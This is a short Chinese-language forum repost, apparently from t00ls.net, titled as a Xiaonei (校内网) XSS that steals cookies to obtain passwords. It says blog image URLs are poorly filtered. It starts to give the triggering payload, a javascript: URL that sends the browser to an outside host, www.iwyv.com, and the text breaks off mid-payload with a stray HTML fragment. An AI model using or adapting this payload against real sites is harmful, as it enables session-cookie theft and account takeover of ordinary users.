标签:漏洞分析校内网&quot
-
校内网最新 xss Cookies得到密码”
From:http://t00ls.net/viewthread.php?tid=1323&highlight= 校内网在发blog时对插入图片过滤不严格,存在xss漏洞. 在发blog时将插入图片URL写为如下代码即可触发:普通浏览复制代码打印代码 javascript:window.location.href='http://www.iwyv.com/test.<SPAN cl...